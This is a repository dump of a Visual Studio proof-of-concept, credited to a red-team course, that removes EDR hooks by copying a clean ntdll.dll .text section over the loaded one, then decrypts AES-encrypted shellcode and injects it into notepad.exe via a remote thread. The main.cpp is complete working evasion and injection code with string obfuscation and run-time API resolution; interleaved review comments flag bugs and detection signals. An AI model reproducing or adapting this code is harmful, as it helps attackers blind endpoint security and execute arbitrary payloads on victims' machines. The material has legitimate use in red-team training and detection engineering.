├── .vs
└── ReplaceHookedNTDLLwFreshCopy
│ └── v16
│ ├── .suo
│ ├── Browse.VC.db
│ └── ipch
│ └── AutoPCH
│ ├── 703f1d784b28c46b
│ └── IMPLANT.ipch
│ └── d9c4ef18c17a115c
│ └── MAIN.ipch
├── README.md
├── ReplaceHookedNTDLLwFreshCopy.sln
├── ReplaceHookedNTDLLwFreshCopy
├── ReplaceHookedNTDLLwFreshCopy.vcxproj
├── ReplaceHookedNTDLLwFreshCopy.vcxproj.filters
├── ReplaceHookedNTDLLwFreshCopy.vcxproj.user
├── main.cpp
└── x64
│ └── Release
│ ├── ReplaceH.00c07e1a.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── ReplaceHookedNTDLLwFreshCopy.lastbuildstate
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ └── link.write.1.tlog
│ ├── ReplaceHookedNTDLLwFreshCopy.exe.recipe
│ ├── ReplaceHookedNTDLLwFreshCopy.iobj
│ ├── ReplaceHookedNTDLLwFreshCopy.ipdb
│ ├── ReplaceHookedNTDLLwFreshCopy.log
│ ├── main.obj
│ └── vc142.pdb
└── x64
└── Release
├── ReplaceHookedNTDLLwFreshCopy.exe
└── ReplaceHookedNTDLLwFreshCopy.pdb
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/.suo
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/Browse.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/Browse.VC.db
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/703f1d784b28c46b/IMPLANT.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/703f1d784b28c46b/IMPLANT.ipch
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/d9c4ef18c17a115c/MAIN.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/d9c4ef18c17a115c/MAIN.ipch
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ClassicAPIUnhooking
2 |
3 | This project is a simple Proof of Concept that removes EDR hooks from Windows APIs by using the classic technique of mapping a fresh NTDLL.dll over the original DLL loaded into the process's memory.
4 |
5 | The payload executed is a simple message box shellcode that has been AES encrypted. It will be injected into the notepad process using the classic shellcode injection technique.
6 | Not many attempts at obfuscation are made. All code was created by the Sektor7 Institute team; I simply packaged it as a VS project.
7 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31410.357
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReplaceHookedNTDLLwFreshCopy", "ReplaceHookedNTDLLwFreshCopy\ReplaceHookedNTDLLwFreshCopy.vcxproj", "{00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x64.ActiveCfg = Debug|x64
17 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x64.Build.0 = Debug|x64
18 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x86.ActiveCfg = Debug|Win32
19 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x86.Build.0 = Debug|Win32
20 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x64.ActiveCfg = Release|x64
21 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x64.Build.0 = Release|x64
22 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x86.ActiveCfg = Release|Win32
23 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {41A9083F-9856-4A0E-A9BD-D69801B06B31}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {00c07e1a-bc2c-47e9-8ff6-d53faa402d72}
25 | ReplaceHookedNTDLLwFreshCopy
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/main.cpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Red Team Operator course code template
4 | classic code injection + with unhooks
5 |
6 | author: reenz0h (twitter: @SEKTOR7net)
7 | credits: NtRaiseHardError
8 |
9 | */
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #pragma comment (lib, "crypt32.lib")
18 | #pragma comment (lib, "advapi32")
19 |
// MessageBox shellcode - 64-bit
// Stored AES-encrypted. AESDecrypt() (called from Inject()) decrypts it in place
// with the global `key`, so the plaintext only exists in this process's memory
// right before it is written to the target.
unsigned char payload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8 };
// Raw key material for AESDecrypt(): it is SHA-256 hashed and the digest is
// handed to CryptDeriveKey(). It sits in the binary in the clear next to the
// ciphertext, so the payload can be recovered offline by anyone holding the file.
unsigned char key[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84 };
23 |
// Size in bytes of the encrypted blob. AESDecrypt() takes this by value and
// CryptDecrypt only updates that local copy, so this global always holds the
// ciphertext length.
unsigned int payload_len = sizeof(payload);
25 |
// Prototypes for the kernel32 exports this program resolves at run time with
// GetProcAddress() rather than linking against them, so the names do not
// appear in the binary's import table (see UnhookNtdll() and main()).
typedef BOOL(WINAPI* VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HANDLE(WINAPI* CreateFileMappingA_t)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);
typedef LPVOID(WINAPI* MapViewOfFile_t)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedef BOOL(WINAPI* UnmapViewOfFile_t)(LPCVOID);
30 |
// Module names built as byte arrays rather than string literals (the author's
// comment in UnhookNtdll() states the intent: keep the names out of the
// literal pool). Both are passed to GetModuleHandleA() cast to LPCSTR.
unsigned char sNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
unsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
33 |
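/*
AESDecrypt() decrypts `payload` in place with CryptoAPI AES-256, using a key
derived from SHA-256(key).

  payload     - ciphertext buffer; overwritten with the plaintext.
  payload_len - length of `payload` in bytes. CryptDecrypt updates only this
                local copy; the caller's length variable is not changed.
  key, keylen - raw key material that is hashed into the AES key.

Returns 0 on success, -1 if any CryptoAPI call fails.

Every provider, hash and key handle that was acquired is released on both the
success and the failure path. The previous version returned straight out of
the middle of the call sequence and leaked whatever had been acquired so far.
*/
int AESDecrypt(char* payload, unsigned int payload_len, char* key, size_t keylen) {
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    int rc = -1;

    // CRYPT_VERIFYCONTEXT: ephemeral context, no persistent key container is used.
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        goto cleanup;
    }
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
        goto cleanup;
    }
    if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
        goto cleanup;
    }
    // The AES-256 key is the SHA-256 digest of `key`, not `key` itself.
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
        goto cleanup;
    }
    // Final = FALSE, unchanged from the original: the data is not treated as
    // the last (padded) block of a message.
    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) {
        goto cleanup;
    }
    rc = 0;

cleanup:
    // Key and hash objects belong to the provider: destroy them first, then
    // release the context. Handles still 0 were never acquired.
    if (hKey) CryptDestroyKey(hKey);
    if (hHash) CryptDestroyHash(hHash);
    if (hProv) CryptReleaseContext(hProv, 0);
    return rc;
}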
62 |
63 |
void XORcrypt(char str2xor[], size_t len, char key) {
    /*
    XORcrypt() applies a single-byte XOR to `len` bytes of `str2xor` in place.
    The operation is its own inverse: running it twice with the same key
    restores the original buffer. A zero length leaves the buffer untouched.
    */
    for (size_t pos = 0; pos < len; ++pos) {
        unsigned char in = (unsigned char)str2xor[pos];
        str2xor[pos] = (char)(in ^ key);
    }
}
74 |
75 |
76 |
/*
FindTarget() returns the PID of the first running process whose image name
equals `procname` (case-insensitive, lstrcmpiW), or 0 when there is no match
or the Toolhelp snapshot cannot be taken.

NOTE(review): the entry filled in by Process32First is only used as a failure
check; comparison starts with Process32Next, so the first process in the
snapshot is never compared. Typically that slot is the system idle entry, but
it is an off-by-one to keep in mind if this is reused with other names.
*/
int FindTarget(const wchar_t* procname) {

    HANDLE hProcSnap;
    PROCESSENTRY32 pe32;
    int pid = 0;

    // Snapshot of every process on the system.
    hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

    // dwSize has to be set before the first Process32* call.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hProcSnap, &pe32)) {
        CloseHandle(hProcSnap);
        return 0;
    }

    // szExeFile is compared as a wide string, so this relies on the project's
    // Unicode character set (PROCESSENTRY32 resolving to the W variant).
    while (Process32Next(hProcSnap, &pe32)) {
        if (lstrcmpiW(procname, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    CloseHandle(hProcSnap);

    return pid;
}
104 |
105 |
106 | // classic injection
/*
Inject() decrypts the shellcode and runs it inside `hProc` using the textbook
remote-thread sequence: VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread.

  hProc       - process handle opened by the caller (main() requests
                create-thread, VM operation/read/write and query rights).
  payload     - ciphertext buffer, decrypted in place with the global `key`.
  payload_len - size of that buffer in bytes.

Returns 0 if the remote thread was created, -1 otherwise.

NOTE(review): the results of AESDecrypt, VirtualAllocEx and WriteProcessMemory
are all discarded. A failed allocation leaves pRemoteCode NULL, and that NULL
is still handed to CreateRemoteThread as the start address.

Detection note: memory is committed as PAGE_EXECUTE_READ in another process,
written from outside, and then used as a thread start address that belongs to
no loaded image - the sequence that remote-injection detections key on.
*/
int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {

    LPVOID pRemoteCode = NULL;
    HANDLE hThread = NULL;

    // Decrypt payload (in place, return value unchecked)
    AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));

    // Executable region in the target, sized to the encrypted length.
    pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
    WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);

    hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
    if (hThread != NULL) {
        // Give the thread up to 500 ms, then let go of the handle regardless.
        WaitForSingleObject(hThread, 500);
        CloseHandle(hThread);
        return 0;
    }
    return -1;
}
126 |
127 |
/*
UnhookNtdll() finds the .text section of the freshly mapped ntdll.dll image
(`pMapping`, which the caller maps with SEC_IMAGE so that section RVAs line up
with a loaded module) and copies it over the .text section of the already
loaded, possibly hooked, ntdll (`hNtdll`).

Returns 0 when the copy was made and the original protection restored, -1 when
no section named ".text" exists or a protection change did not take effect.

Only .text is replaced; anything a hooking product changed outside that
section is left as it was.

Detection note: the loaded ntdll's code pages are switched to
PAGE_EXECUTE_READWRITE and rewritten from user mode. A protection change on an
image-backed region of ntdll followed by a write is the signal defensive
tooling should alert on for this technique.
*/
static int UnhookNtdll(const HMODULE hNtdll, const LPVOID pMapping) {
    // Locate the NT headers of the clean, freshly mapped ntdll.
    DWORD oldprotect = 0;
    PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER)pMapping;
    PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR)pMapping + pImgDOSHead->e_lfanew);
    int i;
    // "VirtualProtect" kept as a byte array rather than a string literal
    // (author's stated intent: keep the name out of the literal pool).
    unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
    // Resolved at run time so VirtualProtect is absent from the import table.
    // The result is not NULL-checked; a failed lookup would fault on first use.
    VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sVirtualProtect);

    // Walk the section table of the mapped image looking for ".text".
    for (i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) {
        PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) +
            ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
        // Section names are an 8-byte field that need not be NUL-terminated;
        // ".text" is short enough that strcmp stops inside the field.
        if (!strcmp((char*)pImgSectionHead->Name, ".text")) {
            // Make the loaded ntdll's .text writable (RWX). The section RVA
            // from the mapped copy is applied to the loaded module's base.
            VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
                pImgSectionHead->Misc.VirtualSize,
                PAGE_EXECUTE_READWRITE,
                &oldprotect);

            // Success is inferred from the out-parameter rather than from the
            // BOOL VirtualProtect returns (discarded): oldprotect was
            // initialised to 0 and stays 0 if the call never wrote it.
            if (!oldprotect) {
                // RWX failed!
                return -1;
            }
            // Copy VirtualSize bytes of the clean .text over the loaded one.
            memcpy((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
                (LPVOID)((DWORD_PTR)pMapping + (DWORD_PTR)pImgSectionHead->VirtualAddress),
                pImgSectionHead->Misc.VirtualSize);

            // Restore the protection saved above. oldprotect doubles as the
            // out-parameter, so this call overwrites it ...
            VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
                pImgSectionHead->Misc.VirtualSize,
                oldprotect,
                &oldprotect);
            // ... and this tests the value the restore call wrote (the RWX
            // protection that was current before it), again instead of the
            // return value.
            if (!oldprotect) {
                // it failed
                return -1;
            }
            return 0;
        }
    }

    // failed? .text not found!
    return -1;
}
182 |
183 |
184 |
185 |
/*
main(): entry point. Order of operations:
  1. XOR-decode the ntdll path, open the on-disk ntdll.dll read-only and map it
     as an image (PAGE_READONLY | SEC_IMAGE, FILE_MAP_READ).
  2. UnhookNtdll(): overwrite the loaded ntdll's .text with the mapped copy.
  3. Unmap and close, then find notepad.exe, open it and Inject() the payload.

Returns -1 if ntdll.dll cannot be opened or mapped; otherwise 0, including
when UnhookNtdll() or the injection fails.

NOTE(review): `ret` receives UnhookNtdll()'s result but is never tested, and
`sNtdll_len` is computed but unused. The two printf/getchar pairs are
interactive checkpoints (presumably for inspecting ntdll before and after in
a debugger) and block an unattended run.
*/
int main(void) {

    int pid = 0;
    HANDLE hProc = NULL;

    //unsigned char sNtdllPath[] = "c:\\windows\\system32\\";
    // XOR-encoded path of the on-disk ntdll.dll (the array decodes to the full
    // file path, not only the directory shown in the comment above). The last
    // byte is both the key and, after decoding (x ^ x == 0), the NUL terminator.
    unsigned char sNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a };

    // kernel32 export names as byte arrays, same scheme as sKernel32 / sNtdll.
    unsigned char sCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0x0 };
    unsigned char sMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0x0 };
    unsigned char sUnmapViewOfFile[] = { 'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e', 0x0 };

    unsigned int sNtdllPath_len = sizeof(sNtdllPath);
    unsigned int sNtdll_len = sizeof(sNtdll);   // computed but never used
    int ret = 0;
    HANDLE hFile;
    HANDLE hFileMapping;
    LPVOID pMapping;

    // get function pointers
    // Resolved through GetProcAddress so the names stay out of the import
    // table. None of the three pointers is NULL-checked before use.
    CreateFileMappingA_t CreateFileMappingA_p = (CreateFileMappingA_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sCreateFileMappingA);
    MapViewOfFile_t MapViewOfFile_p = (MapViewOfFile_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sMapViewOfFile);
    UnmapViewOfFile_t UnmapViewOfFile_p = (UnmapViewOfFile_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sUnmapViewOfFile);

    // open ntdll.dll
    // Decode the path in place; the key is the array's own last byte.
    XORcrypt((char*)sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
    // Read-only handle to the on-disk (unhooked) ntdll.dll.
    hFile = CreateFileA((LPCSTR)sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        // failed to open ntdll.dll
        return -1;
    }

    // prepare file mapping
    // SEC_IMAGE lays the file out as a loaded PE image, so section RVAs inside
    // the view match those of the loaded module (UnhookNtdll relies on this).
    hFileMapping = CreateFileMappingA_p(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    if (!hFileMapping) {
        // file mapping failed
        CloseHandle(hFile);
        return -1;
    }

    // map the bastard
    // Map the whole image read-only into this process.
    pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
    if (!pMapping) {
        // mapping failed
        CloseHandle(hFileMapping);
        CloseHandle(hFile);
        return -1;
    }

    // Interactive checkpoint: waits for a keypress before the unhook.
    printf("Check 1!\n"); getchar();

    // remove hooks
    // Overwrite the loaded ntdll's .text with the clean copy. The result lands
    // in `ret` but is never examined, so a failed unhook is silently ignored.
    ret = UnhookNtdll(GetModuleHandleA((LPCSTR)sNtdll), pMapping);

    // Second checkpoint, after the unhook.
    printf("Check 2!\n"); getchar();

    // Clean up.
    UnmapViewOfFile_p(pMapping);
    CloseHandle(hFileMapping);
    CloseHandle(hFile);

    // Locate the injection target by image name (case-insensitive).
    pid = FindTarget(L"notepad.exe");

    if (pid) {
        printf("Notepad.exe PID = %d\n", pid);

        // try to open target process
        // Rights cover what Inject() calls later: VM operation/write for
        // VirtualAllocEx and WriteProcessMemory, create-thread for
        // CreateRemoteThread.
        hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
            PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
            FALSE, (DWORD)pid);

        if (hProc != NULL) {
            // Inject()'s return value is not checked either.
            Inject(hProc, payload, payload_len);
            CloseHandle(hProc);
        }
    }
    return 0;
}
271 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/ReplaceHookedNTDLLwFreshCopy.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
2 | Release|x64|C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\|
3 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.read.1.tlog
